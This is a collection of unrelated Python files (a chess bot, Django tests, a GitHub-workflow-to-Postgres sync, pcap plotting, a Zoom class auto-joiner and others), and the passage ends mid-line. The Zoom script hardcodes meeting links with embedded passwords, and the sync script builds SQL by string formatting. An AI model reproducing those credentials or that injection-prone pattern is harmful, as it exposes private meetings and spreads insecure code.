hidden_units=[10, 20, 10],\n n_classes=300, model_dir=checkpointDir)\n\narg = sys.argv[1].replace(u\"\\u2022\", u\"\")\n\nif arg == \"training\":\n try:\n if not os.path.isdir(checkpointDir):\n os.mkdir(checkpointDir)\n else:\n # training이 필요한 시점만 True로 전환 기존 모델 삭제\n shutil.rmtree(checkpointDir, False)\n\n # training이 필요한 시점만 True로 전환\n classifier.fit(x=testNpData, y=testNpTarget, steps=2000)\n\n print(str({'code': 200, 'message': 'form mapping train success'}))\n except Exception as e:\n print(str({'code': 500, 'message': 'form mapping train fail', 'error': str(e).replace(\"'\",\"\").replace('\"','')}))\nelse:\n inputArr = json.loads(sys.argv[1].replace(u\"\\u2022\", u\"\"))\n\n companySid = ''\n contractSid = ''\n predictArr = []\n predictData = []\n\n try:\n for inputItem in inputArr:\n if 1 == inputItem['formLabel']:\n companySid = inputItem['sid']\n if 2 == inputItem['formLabel']:\n contractSid = inputItem['sid']\n\n if '' == companySid:\n companySid = '0,0,0,0,0,0,0'\n if '' == contractSid:\n contractSid = '0,0,0,0,0,0,0'\n\n for sidItem in ','.join((companySid, contractSid)).split(\",\"):\n predictData.append(float(sidItem))\n\n #db에 일치하는 docSid가 있는 경우 db의 label값을 가져와서 리턴\n predictDocType = {}\n\n for row in rows:\n floatArr = []\n num = str(row[1]).split(\",\")\n for n in num:\n floatArr.append(float(n))\n\n if floatArr == predictData:\n predictDocType['docType'] = int(row[2])\n predictDocType['docAccu'] = 0.99\n\n #db에 일치하는 sid가 없을 경우 ML predict 결과를 리턴\n if 'docType' not in predictDocType:\n predictArr.append(predictData) \n resultArr = list(classifier.predict(np.array(predictArr, dtype=np.float32), as_iterable=True))\n accLabel = []\n accLabel.append(int(resultArr[0]))\n accTarget = np.array(accLabel)\n accuracy_score = classifier.evaluate(x=np.array(predictArr, dtype=float), y=np.array(accTarget, dtype=int))[\"accuracy\"]\n predictDocType['docType'] = resultArr[0]\n if accuracy_score > 0.02:\n accuracy_score -= 0.01\n predictDocType['docAccu'] = accuracy_score\n\n inputArr.append(predictDocType)\n\n print(str(inputArr))\n except Exception as e:\n print(str({'code': 500, 'message': 'form mapping predict fail', 'error': str(e).replace(\"'\",\"\").replace('\"','')}))","sub_path":"ml/FormMapping/eval2.py","file_name":"eval2.py","file_ext":"py","file_size_in_byte":4238,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"629022665","text":"import chess\nimport os\nimport berserk\nfrom dotenv import load_dotenv\nfrom random import choice\nfrom time import perf_counter\nload_dotenv()\n\nPIECES_VALUES = {\n \"p\": -1,\n \"n\": -3,\n \"b\": -3,\n \"r\": -5,\n \"q\": -9,\n \"k\": 0,\n\n \"P\": 1,\n \"N\": 3,\n \"B\": 3,\n \"R\": 5,\n \"Q\": 9,\n \"K\": 0\n}\n\ndef eval_board(b: chess.Board) -> float:\n if b.result()==\"0-1\":\n return float(\"-inf\")\n if b.result()==\"1-0\":\n return float(\"inf\")\n if b.result()==\"1/2-1/2\":\n return 0\n s = 0\n for square in b.piece_map():\n piece = b.piece_at(square)\n color_sign = (1 if piece.symbol().isupper() else -1)\n\n if chess.SQUARE_NAMES[square.__pos__()] in [\"e4\", \"d4\", \"e5\", \"d5\"]:\n s += 2*color_sign\n\n if piece.symbol() == \"T\" and chess.square_rank(square) == 6:\n s += 2\n if piece.symbol() == \"t\" and chess.square_rank(square) == 1:\n s -= 2\n \n s+=len(b.attacks(square))*color_sign*0.1\n \n s += PIECES_VALUES[piece.symbol()]\n if b.is_check() and b.turn==chess.WHITE:\n s-=2\n if b.is_check() and b.turn==chess.BLACK:\n s+=2\n return s\n\n\ndef min_max(b: chess.Board, depth: int) -> float:\n if depth == 0:\n return eval_board(b)\n if b.turn == chess.WHITE:\n value = float(\"-inf\")\n for move in b.legal_moves:\n b_tmp = b.copy()\n b_tmp.push(move)\n value = max(value, min_max(b_tmp, depth-1))\n return value\n else:\n value = float(\"inf\")\n for move in b.legal_moves:\n b_tmp = b.copy()\n b_tmp.push(move)\n value = min(value, min_max(b_tmp, depth-1))\n return value\n\n\ndef alpha_beta(b: chess.Board, depth: int, alpha=float(\"-inf\"), beta=float(\"inf\")) -> float:\n if depth == 0:\n return eval_board(b)\n if b.turn == chess.WHITE:\n value = float(\"-inf\")\n for move in b.legal_moves:\n b_tmp = b.copy()\n b_tmp.push(move)\n value = max(value, alpha_beta(b_tmp, depth-1, alpha, beta))\n if value>beta:\n return value\n alpha = max(alpha, value)\n else:\n value = float(\"inf\")\n for move in b.legal_moves:\n b_tmp = b.copy()\n b_tmp.push(move)\n value = min(value, alpha_beta(b_tmp, depth-1,alpha,beta))\n if value < alpha:\n return value\n beta = min(beta, value)\n return value\n\n\ndef compute_best_move(b: chess.Board, depth: int, print_moves=True, algo=alpha_beta,) -> str:\n values = []\n for move in b.legal_moves:\n b_copy = b.copy()\n b_copy.push(move)\n values.append(algo(b_copy,depth))\n best_value = max(values) if b.turn else min(values)\n list_legal_moves = [move.uci() for move in b.legal_moves]\n best_moves = [move for i,move in enumerate(list_legal_moves) if values[i]==best_value]\n best_move = choice(best_moves)\n if print_moves:\n print(\"Best move:\", b.san(chess.Move.from_uci(best_move)))\n print(\"Value:\", max(values))\n print()\n return best_move\n\n\ndef turochamp(depth:int) -> None:\n session = berserk.session.TokenSession(os.environ[\"LICHESS_TOKEN\"])\n client = berserk.Client(session)\n b = chess.Board()\n for e in client.bots.stream_incoming_events():\n if e[\"type\"] == \"gameStart\":\n game_id = e[\"game\"][\"id\"]\n game_state_stream = client.bots.stream_game_state(game_id)\n initial_state = next(game_state_stream)\n color = chess.WHITE if \"id\" in initial_state[\"white\"].keys() else chess.BLACK\n moves = initial_state[\"state\"][\"moves\"]\n for m in moves.split(\" \"):\n if m != \"\":\n b.push_uci(m)\n if b.turn==color:\n best_move = compute_best_move(b, depth)\n client.bots.make_move(game_id, best_move)\n for state in game_state_stream:\n last_move = state[\"moves\"].split(\" \")[-1]\n b.push_uci(last_move)\n if b.is_game_over():\n b.reset()\n break\n if b.turn==color:\n best_move = compute_best_move(b, depth)\n client.bots.make_move(game_id, best_move)\n \n\nturochamp(2)\n# b = chess.Board()\n# s = perf_counter()\n# x = compute_best_move(b,0)\n# t = perf_counter()-s\n# print(f\"time:{t}\")\n\n# b.push_san(\"e4\")\n# b.push_san(\"e5\")\n# b.push_san(\"d4\")\n# b.push_san(\"Bb4+\")\n# compute_best_move(b,3)\n# scholar_mate = \"e4 e5 Qh5 Nc6 Bc4 Nf6 Qxf7\"\n# fool_mate = \"f3 e6 g4 Qh4\"\n# for move in fool_mate.split(\" \"):\n# b.push_san(move)\n# print(b.result())\n\n\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"145076530","text":"from rest_framework.test import APITestCase, APIClient\nfrom rest_framework import status\nfrom rest_framework.exceptions import ValidationError\n\nfrom api.models import Community\n\nfrom django.urls import reverse\nfrom django.contrib.auth import get_user_model\nimport json\n\nUser = get_user_model()\n\n\nclass TestCreateCommunity(APITestCase):\n\n def setUp(self) -> None:\n self.client = APIClient()\n self.django_community = 'django'\n self.user = User.objects.create(username='crit')\n self.data = {\n 'name': self.django_community,\n 'moderators': [\n {'username': self.user.username}\n ]\n }\n self.client.force_authenticate(user=self.user)\n\n def test_create_community_with_valid_user(self):\n response = self.client.post(reverse('get_post_community'), data=json.dumps(self.data),\n content_type='application/json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertIn(b'crit', response.content)\n\n def test_cant_create_existing_community(self):\n self.client.post(reverse('get_post_community'), data=json.dumps(self.data),\n content_type='application/json')\n response = self.client.post(reverse('get_post_community'), data=json.dumps(self.data),\n content_type='application/json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertIn(b'name', response.content)\n\n def test_cant_create_community_with_invalid_user(self):\n self.data['moderators'][0]['username'] = 'anon'\n response = self.client.post(reverse('get_post_community'), data=json.dumps(self.data),\n content_type='application/json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertIn(b'moderators', response.content)\n\n def test_create_community_with_two_mods(self):\n User.objects.create(username='anon')\n self.data['moderators'].append({'username': 'anon'})\n response = self.client.post(reverse('get_post_community'), data=json.dumps(self.data),\n content_type='application/json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertIn(b'anon', response.content)\n self.assertIn(b'crit', response.content)\n\n def test_cant_create_community_with_one_wrong_mod(self):\n self.data['moderators'].append({'username': 'user'})\n response = self.client.post(reverse('get_post_community'), data=json.dumps(self.data),\n content_type='application/json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertIn(b'User with username: user does not exist.', response.content)\n\n def test_cant_create_community_with_duplicate_users(self):\n self.data['moderators'].append({'username': 'crit'})\n response = self.client.post(reverse('get_post_community'), data=json.dumps(self.data),\n content_type='application/json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n","sub_path":"api/tests/test_community.py","file_name":"test_community.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"22278373","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n'''\nThis module queries GitHub to collect Beam-related workflows metrics and put them in\nPostgreSQL.\nThis Script is running every 3 hours in a cloud function in apache-beam-testing project.\nThis cloud function is triggered by a pubsub topic.\nYou can find the cloud function in the next link \nhttps://console.cloud.google.com/functions/details/us-central1/github_actions_workflows_dashboard_sync?env=gen1&project=apache-beam-testing\nPub sub topic : https://console.cloud.google.com/cloudpubsub/topic/detail/github_actions_workflows_sync?project=apache-beam-testing\nCron Job : https://console.cloud.google.com/cloudscheduler/jobs/edit/us-central1/github_actions_workflows_dashboard_sync?project=apache-beam-testing\nWriting the latest 10 runs of every postcommit workflow in master branch in a beammetrics database\n'''\n\nimport os\nimport sys\nimport time\nimport re\nimport requests\nimport psycopg2\n\nfrom datetime import datetime\nfrom github import GithubIntegration \n\nDB_HOST = os.environ['DB_HOST']\nDB_PORT = os.environ['DB_PORT']\nDB_NAME = os.environ['DB_DBNAME']\nDB_USER_NAME = os.environ['DB_DBUSERNAME']\nDB_PASSWORD = os.environ['DB_DBPWD']\nGH_WORKFLOWS_TABLE_NAME = \"github_workflows\"\n# Number of workflows that fetch github API\nGH_NUMBER_OF_WORKFLOWS = 100 \nGH_WORKFLOWS_NUMBER_EXECUTIONS = 100\nWORKFLOWS_OBJECT_LIST = []\n\n\nclass Workflow:\n def __init__(self,id,name,filename):\n self.id = id\n self.name = name\n self.filename = filename\n self.listOfRuns = []\n self.runUrl = []\n\n# The table will save the latest ten run of every workflow\nGH_WORKFLOWS_CREATE_TABLE_QUERY = f\"\"\"\nCREATE TABLE IF NOT EXISTS {GH_WORKFLOWS_TABLE_NAME} (\n job_name text PRIMARY KEY,\n job_yml_filename text\"\"\"\nfor i in range(0,GH_WORKFLOWS_NUMBER_EXECUTIONS):\n i = i + 1\n GH_WORKFLOWS_CREATE_TABLE_QUERY += \"\"\",\\n run{} text,\n run{}Id text\"\"\".format(str(i),str(i))\nGH_WORKFLOWS_CREATE_TABLE_QUERY += \")\\n\"\n\ndef githubWorkflowsGrafanaSync(data,context):\n print('Started')\n print('Updating table with recent workflow runs')\n databaseOperations(initDbConnection(),fetchWorkflowData())\n print('Done')\n return \"Completed\"\n\ndef initDbConnection():\n '''Init connection with the Database'''\n connection = None\n maxRetries = 3\n i = 0 \n while connection == None and i < maxRetries:\n try:\n connection = psycopg2.connect(\n f\"dbname='{DB_NAME}' user='{DB_USER_NAME}' host='{DB_HOST}'\"\n f\" port='{DB_PORT}' password='{DB_PASSWORD}'\")\n except Exception as e:\n print('Failed to connect to DB; retrying in 1 minute')\n print(e)\n time.sleep(60)\n i = i + 1\n if i >= maxRetries:\n print(\"Number of retries exceded \")\n sys.exit(1)\n return connection\n\ndef getToken():\n git_integration = GithubIntegration(\n os.environ[\"GH_APP_ID\"],\n os.environ[\"GH_PEM_KEY\"])\n token=git_integration.get_access_token(\n os.environ[\"GH_APP_INSTALLATION_ID\"]\n ).token\n return token\n\ndef retriesRequest(request):\n requestSucceeded = False\n retryFactor = 1\n while not requestSucceeded:\n retryTime = 60 * retryFactor\n if request.status_code != 200:\n print('Failed to get the request with code {}'.format(request.status_code))\n time.sleep(retryTime)\n retryFactor = retryFactor + retryFactor\n if retryFactor * 60 >= 3600:\n print(\"Error: The request take more than an hour\")\n sys.exit(1)\n else:\n requestSucceeded = True\ndef fetchWorkflowData():\n '''Return a json with all the workflows and the latests\n ten executions'''\n completed = False\n page = 1 \n workflows = []\n try:\n while not completed:\n url = \"https://api.github.com/repos/apache/beam/actions/workflows\"\n queryOptions = { 'branch' : 'master', 'page': page, 'per_page' : GH_NUMBER_OF_WORKFLOWS }\n response = requests.get(url = url, params = queryOptions)\n retriesRequest(response)\n jsonResponse = response.json()\n if jsonResponse['total_count'] >= GH_NUMBER_OF_WORKFLOWS:\n page = page + 1\n workflowsPage = jsonResponse['workflows']\n workflows.append(workflowsPage)\n else:\n completed = True\n workflowsPage = jsonResponse['workflows']\n workflows.append(workflowsPage)\n for pageItem in workflows:\n for item in pageItem:\n path =item['path']\n isPostCommit = re.search('(.*)postcommit(.*)',path)\n if isPostCommit:\n result = re.search('/(.*).yml', path)\n path =(result.group(1)) + \".yml\"\n workflowObject = Workflow(item['id'],item['name'],path)\n WORKFLOWS_OBJECT_LIST.append(workflowObject)\n url = \"https://api.github.com/repos/apache/beam/actions/workflows/\"\n queryOptions = { 'branch' : 'master', 'per_page' : GH_WORKFLOWS_NUMBER_EXECUTIONS,\n 'page' :'1', 'exclude_pull_request':True }\n for workflow in WORKFLOWS_OBJECT_LIST: \n response = requests.get(url = \"{}{}/runs\".format(url,workflow.id),\n params=queryOptions)\n retriesRequest(response)\n responseJson = response.json()\n workflowsRuns = responseJson['workflow_runs']\n for item in workflowsRuns:\n if item['status'] == 'completed':\n workflow.runUrl.append(item['html_url'])\n workflow.listOfRuns.append(item['conclusion'])\n else:\n workflow.listOfRuns.append(item['status'])\n workflow.runUrl.append(item['html_url'])\n for i in range(0,GH_WORKFLOWS_NUMBER_EXECUTIONS): \n if i >= len(workflow.listOfRuns):\n workflow.listOfRuns.append('None')\n workflow.runUrl.append('None')\n except Exception as e:\n print('Failed to get GHA workflows')\n print(e)\n\ndef databaseOperations(connection,fetchWorkflows):\n '''Create the table if not exist and update the table with the latest runs\n of the workflows '''\n queryInsert = \"INSERT INTO {} VALUES \".format(GH_WORKFLOWS_TABLE_NAME)\n cursor = connection.cursor()\n cursor.execute(GH_WORKFLOWS_CREATE_TABLE_QUERY)\n cursor.execute(\"DELETE FROM {};\".format(GH_WORKFLOWS_TABLE_NAME))\n query = \"\"\n for workflow in WORKFLOWS_OBJECT_LIST:\n rowInsert = \"(\\'{}\\',\\'{}\\'\".format(workflow.name,workflow.filename)\n for run, runUrl in zip(workflow.listOfRuns,workflow.runUrl):\n rowInsert += \",\\'{}\\',\\'{}\\'\".format(run,runUrl)\n query = query + rowInsert\n query += \"),\"\n query = query[:-1] + \";\" \n query = queryInsert + query\n cursor.execute(query)\n cursor.close()\n connection.commit()\n connection.close()","sub_path":".test-infra/metrics/sync/github/sync_workflows.py","file_name":"sync_workflows.py","file_ext":"py","file_size_in_byte":7536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"217543751","text":"# -*- coding: utf-8 -*-\n\nfrom django.conf.urls import url\n\nfrom i_base.api import rest\n\nurlpatterns = [\n url(r'^$', rest.EntrypointView.as_view(), name='entrypoint'),\n # url(r'^users/$', rest.UserView.as_view(), name='user-list'),\n url(r'^users/(?P\\d+)/$', rest.UserView.as_view(), name='user-detail'),\n # url(r'^users/(?P\\d+)/$', rest.UserView.as_view(), name='user-picture'),\n url(r'^users/(?P\\d+)/ideas/$', rest.UserIdeasView.as_view(), name='user-idea-list'),\n url(r'^users/(?P\\d+)/comments/$', rest.UserCommentsView.as_view(), name='user-comment-list'),\n url(r'^users/(?P\\d+)/ratings/$', rest.UserRatingsView.as_view(), name='user-ratings-list'),\n url(r'^ideas/$', rest.IdeaListView.as_view(), name='idea-list'),\n url(r'^ideas/(?P\\d+)/$', rest.IdeaView.as_view(), name='idea-detail'),\n url(r'^ideas/(?P\\d+)/comments/$', rest.CommentListView.as_view(), name='idea-comment-list'),\n url(r'^ideas/(?P\\d+)/ratings/$', rest.RatingListView.as_view(), name='idea-rating-list'),\n url(r'^comments/(?P\\d+)/$', rest.CommentView.as_view(), name='comment-detail'),\n url(r'^ratings/(?P\\d+)/$', rest.RatingView.as_view(), name='rating-detail'),\n]\n","sub_path":"i_base/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"287703358","text":"import unittest\nimport os\nfrom geogitpy.repo import Repository\nimport time\nimport shutil\nfrom geogitpy import geogit\nfrom geogitpy.feature import Feature\nfrom shapely.geometry import Polygon\n\nclass GeogitFeatureTest(unittest.TestCase):\n \n repo = Repository(os.path.join(os.path.dirname(__file__), 'data/testrepo'))\n\n def getTempPath(self):\n return os.path.join(os.path.dirname(__file__), \"temp\", str(time.time())).replace('\\\\', '/')\n\n def getClonedRepo(self):\n src = self.repo.url\n dst = self.getTempPath()\n shutil.copytree(src, dst)\n return Repository(dst)\n\n def testExists(self):\n feature = Feature(self.repo, geogit.HEAD, \"parks/1\") \n self.assertTrue(feature.exists())\n feature = Feature(self.repo, geogit.HEAD, \"wrong/path\") \n self.assertFalse(feature.exists())\n\n def testAttributes(self): \t\n feature = Feature(self.repo, geogit.HEAD, \"parks/1\") \t \n data = feature.attributes() \n self.assertEquals(8, len(data))\n self.assertEquals(\"Public\", data[\"usage\"])\n self.assertTrue(\"owner\" in data)\n self.assertTrue(\"agency\" in data)\n self.assertTrue(\"name\" in data)\n self.assertTrue(\"parktype\" in data)\n self.assertTrue(\"area\" in data)\n self.assertTrue(\"perimeter\" in data) \n self.assertTrue(\"the_geom\" in data) \n self.assertTrue(isinstance(data[\"the_geom\"][0], Polygon)) \n \n def testDiff(self):\n feature = Feature(self.repo, geogit.HEAD, \"parks/5\")\n featureB = Feature(self.repo, geogit.HEAD + \"~1\", \"parks/5\")\n diffs = feature.diff(featureB) \n self.assertTrue(2, len(diffs))\n areas = diffs[\"area\"]\n self.assertEquals(\"15297.503295898438\", areas[1])\n self.assertEquals(\"15246.59765625\", areas[0])\n self.assertTrue(\"the_geom\" in diffs)\n\n def testBlame(self):\n feature = Feature(self.repo, geogit.HEAD, \"parks/5\")\n blame = feature.blame() \n self.assertEquals(8, len(blame))\n attrs = feature.attributes()\n for k,v in blame.iteritems():\n self.assertTrue(v[0], attrs[k])\n\n def testFeatureType(self):\n feature = Feature(self.repo, geogit.HEAD, \"parks/5\")\n ftype = feature.featuretype()\n\n","sub_path":"src/test/featuretest.py","file_name":"featuretest.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"450823709","text":"#!/usr/bin/env python\n\"\"\"\nExample code to plot time series for ECE 8930 second assignment\ntshark, matplotlib, and numpy are required packages for this example code\n\"\"\"\nimport read_pcap\nimport time_series\nimport rand_arr_time\n\ndef example1_plot_time_series_from_pcap_file():\n \"\"\"\n This is an example usage of read_pcap.py\n read_pcap.py reads data from pcap file\n \"\"\"\n files='*.pcap*' # Pcap(ng) files location\n columns=['frame.time_epoch'] # Linux time\n filter_str='' # Filter String\n output_file='a.txt' # Output file\n data=read_pcap.read_pcap_files(files, columns, filter_str, output_file) # Get packets' Linux time, the output is a list of string\n arrive_time=[float(item[0])-float(data[0][0]) for item in data] # Format the list of strings to a list of floating numbers\n time_series.plot_time_series(arrive_time) # Plot time series using packets arrive time\n\ndef example2_plot_time_series_from_simulated_data():\n \"\"\"\n This is an example usage of rand_arr_time.py\n rand_arr_time.py generate a random integer list\n \"\"\"\n option=6 # There are 6 options in total, each use different method to generate random arriving times\n Number_of_packets=10000 # Number of packets generated\n expected_duratation=1000 # Expected length of time in seconds\n arrive_time=rand_arr_time.rand_arr_time(option,Number_of_packets,expected_duratation) # Get packet arrive time, with option 3, 100000 packets, expected in 1000 seconds.\n time_series.plot_time_series(arrive_time) # Plot time series using packets arrive time\n\n\ndef main():\n example1_plot_time_series_from_pcap_file()\n example2_plot_time_series_from_simulated_data()\n\nif __name__ == '__main__':\n main()\n","sub_path":"lab3/plot/plot_time_series_example.py","file_name":"plot_time_series_example.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"327977701","text":"from django.conf.urls import include, patterns, url\n\nfrom rest_framework.urlpatterns import format_suffix_patterns\n\nfrom api import views\n\n\nurlpatterns = patterns('',\n # url(r'^', views.api_root),\n url(r'^users/$', views.UserList.as_view(), name='user-list'),\n url(r'^users/(?P[0-9]+)/$', views.UserInstance.as_view(), name='user-detail'),\n url(r'^messages/$', views.MessageList.as_view(), name='message-list'),\n url(r'^messages/(?P[0-9]+)/$', views.MessageInstance.as_view(), name='message-detail'),\n)\n\nurlpatterns += patterns('',\n url(r'^auth/', include('rest_framework.urls',\n namespace='rest_framework')),\n)\n\nurlpatterns = format_suffix_patterns(urlpatterns)\n","sub_path":"emberplay/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"284047406","text":"class Solution(object):\n def findPeakElement(self, nums):\n left, right = 0, len(nums) - 1\n while left < right:\n mid = (left + right) // 2\n if nums[mid] > nums[mid + 1]:\n right = mid\n else:\n left = mid + 1\n return left\n\n\nclass Solution(object):\n def findPeakElement(self, nums):\n left = [False] * len(nums)\n right = [False] * len(nums)\n left[0], right[len(nums) - 1] = True, True\n for index in range(1, len(nums)):\n if nums[index] > nums[index - 1]:\n left[index] = True\n for index in range(len(nums) - 2, -1, -1):\n if nums[index] > nums[index + 1]:\n right[index] = True\n for index in range(len(left)):\n if left[index] and right[index]:\n return index\n return -1\n","sub_path":"162/162.find-peak-element.233252346.Accepted.leetcode.py","file_name":"162.find-peak-element.233252346.Accepted.leetcode.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"440406691","text":"import logging\nimport uuid\nfrom functools import cached_property\nfrom time import time\nfrom unittest import mock\n\nfrom django.urls import reverse\n\nfrom sentry.event_manager import EventManager\nfrom sentry.testutils import TestCase\nfrom sentry.testutils.helpers import override_options\nfrom sentry.testutils.performance_issues.event_generators import get_event\n\n\ndef make_event(**kwargs):\n result = {\n \"event_id\": uuid.uuid1().hex,\n \"level\": logging.ERROR,\n \"logger\": \"default\",\n \"tags\": [],\n }\n result.update(kwargs)\n return result\n\n\nnplus_one_no_timestamp = {**get_event(\"n-plus-one-in-django-index-view\")}\ndel nplus_one_no_timestamp[\"timestamp\"]\n\n\nclass DisabledMemberViewTest(TestCase):\n @cached_property\n def path(self):\n return reverse(\"sentry-organization-newest-performance-issue\", args=[self.org.slug])\n\n def setUp(self):\n super().setUp()\n self.owner = self.create_user()\n self.org = self.create_organization(owner=self.owner)\n self.user = self.create_user()\n self.create_member(user=self.user, organization=self.org, role=\"member\")\n self.team1 = self.create_team(organization=self.org, members=[self.user])\n self.team2 = self.create_team(organization=self.org, members=[self.owner])\n self.project1 = self.create_project(organization=self.org, teams=[self.team1])\n self.project2 = self.create_project(organization=self.org, teams=[self.team2])\n self.login_as(self.user)\n\n @override_options({\"store.use-ingest-performance-detection-only\": 1.0})\n @override_options({\"performance.issues.n_plus_one_db.problem-creation\": 1.0})\n def test_simple(self):\n self.project1.update_option(\"sentry:performance_issue_creation_rate\", 1.0)\n self.project2.update_option(\"sentry:performance_issue_creation_rate\", 1.0)\n with mock.patch(\"sentry_sdk.tracing.Span.containing_transaction\"), self.feature(\n {\n \"projects:performance-suspect-spans-ingestion\": True,\n }\n ):\n latest_event_time = time()\n older_event_time = latest_event_time - 300\n\n manager = EventManager(make_event(**nplus_one_no_timestamp, timestamp=older_event_time))\n manager.normalize()\n event1 = manager.save(self.project1.id)\n\n manager = EventManager(\n make_event(**nplus_one_no_timestamp, timestamp=latest_event_time)\n )\n manager.normalize()\n event2 = manager.save(self.project2.id)\n\n # issue error\n manager = EventManager(make_event(timestamp=latest_event_time))\n manager.normalize()\n manager.save(self.project1.id)\n\n resp = self.client.get(self.path, follow=True)\n assert resp.redirect_chain == [\n (f\"/organizations/{self.org.slug}/issues/{event1.groups[0].id}/\", 302)\n ]\n\n self.login_as(self.owner)\n resp = self.client.get(self.path, follow=True)\n assert resp.redirect_chain == [\n (f\"/organizations/{self.org.slug}/issues/{event2.groups[0].id}/\", 302)\n ]\n\n def test_no_performance_issue(self):\n resp = self.client.get(self.path, follow=True)\n assert resp.redirect_chain == [(f\"/organizations/{self.org.slug}/issues/\", 302)]\n","sub_path":"tests/sentry/web/frontend/test_newest_performance_issue.py","file_name":"test_newest_performance_issue.py","file_ext":"py","file_size_in_byte":3327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"360386890","text":"\"\"\"\nThis program collects the weights of all the conv2d and dense layers\nto feed it to the jupyter notebook for analysis.\n\"\"\"\n\nfrom os.path import join, expanduser\n\nfrom keras.layers.convolutional import Conv2D\nfrom keras.layers.core import Dense\nimport numpy as np\n\nfrom nnclib.model_dict import model_dict\nfrom nnclib.utils import reshape_weights\n\n\ndef proc_layer(layer):\n if isinstance(layer, (Dense, Conv2D)):\n # print('type', type(layer))\n if isinstance(layer, Dense):\n typ = 'dense'\n else:\n typ = 'conv2d'\n weights = layer.get_weights()[0]\n shp = np.shape(weights)\n shp = 'x'.join(map(str, shp))\n result = reshape_weights(weights)\n return [typ, shp, result]\n\ndef proc_model(model):\n results = []\n for idx, layer in enumerate(model.layers):\n result = proc_layer(layer)\n if result is not None:\n results.append([idx] + result)\n return results\n\n\ndef write_results(results, name, base=expanduser(\"~/tmp/nnc_weights\")):\n for idx, typ, shp, result in results:\n file_name = \"{}_{}_{}_{}\".format(name, idx, typ, shp)\n file_name = join(base, file_name)\n np.save(file_name, result)\n\n\ndef proc_all_models():\n for name, value in model_dict.items():\n print(name)\n model = value[0]()\n results = proc_model(model)\n write_results(results, name)\n\n\nif __name__ == '__main__':\n proc_all_models()\n","sub_path":"src/utils/collect_weights.py","file_name":"collect_weights.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"506047752","text":"from datetime import datetime\nimport time\nimport webbrowser\n\n\nclass links:\n dm = \"https://us04web.zoom.us/j/9922162287?pwd=Wkp3TXgySWh5Ylo0bkxtR0FFdXlFZz09\"\n es = \"https://us04web.zoom.us/j/6845247405?pwd=VXVHWWY4RGxVLzFSRzl6NjEzTWdJUT09\"\n pcc = \"https://zoom.us/j/3848569137?pwd=ZTFtTmM3WndOcFR0YXhPYWEzSjlHUT09\"\n ada = \"https://us04web.zoom.us/j/75820775605?pwd=cXFCR1ZUN2tOcFdQNDBzZ0dYQ3VMQT09\"\n eh = \"https://us04web.zoom.us/j/79099639821?pwd=Nk40UkdEdjZnNC9aVWdxb3p6OHVuZz09\"\n iot = \"https://us04web.zoom.us/j/76580633198?pwd=R3NOZ3JMaWhaaUVIQlhuZnY2Zmk2dz09\"\n\n\ndef checkforclass():\n\n now = datetime.now()\n currenttime = now.strftime(\"%H:%M\")\n print(\"Current time is : \" +currenttime)\n\n if(currenttime == classtime[4]):\n webbrowser.open(links.iot,new=1)\n print(\"Joined Class\")\n time.sleep(3000)\n print(\"Class ended\")\n checkforclass()\n\n elif(currenttime == classtime[3]):\n webbrowser.open(links.es,new=1)\n print(\"Joined Class\")\n time.sleep(3000)\n print(\"Class ended\")\n checkforclass()\n \n elif(currenttime == classtime[0]):\n webbrowser.open(links.pcc,new=1)\n print(\"Joined Class\")\n time.sleep(3000)\n print(\"Class ended\")\n checkforclass()\n\n elif(currenttime == classtime[5]):\n webbrowser.open(links.dm,new=1)\n print(\"Joined Class\")\n time.sleep(3000)\n print(\"Class ended\")\n checkforclass()\n \n elif(currenttime == classtime[2]):\n webbrowser.open(links.eh,new=1)\n print(\"Joined Class\")\n time.sleep(3000)\n print(\"Class ended\")\n checkforclass()\n\n elif(currenttime == classtime[1]):\n webbrowser.open(links.ada,new=1)\n print(\"Joined class\")\n time.sleep(3000)\n print(\"Class ended\")\n checkforclass()\n\n elif(currenttime >= \"18:30\"):\n print(\"All the classes are done\")\n\n else:\n print(\"Will join shortly\")\n time.sleep(60)\n checkforclass()\n\n\n#entering class time\n\npcct=input(\"Enter PCC time : \")\nadat=input(\"Enter ADA time : \")\neht=input(\"Enter EH time : \")\nest=input(\"Enter ES time : \")\niott=input(\"Enter IOT time : \")\ndmt=input(\"Enter DM time : \")\n\nclasstime=[pcct,adat,eht,est,iott,dmt]\nprint(\"You have classes at 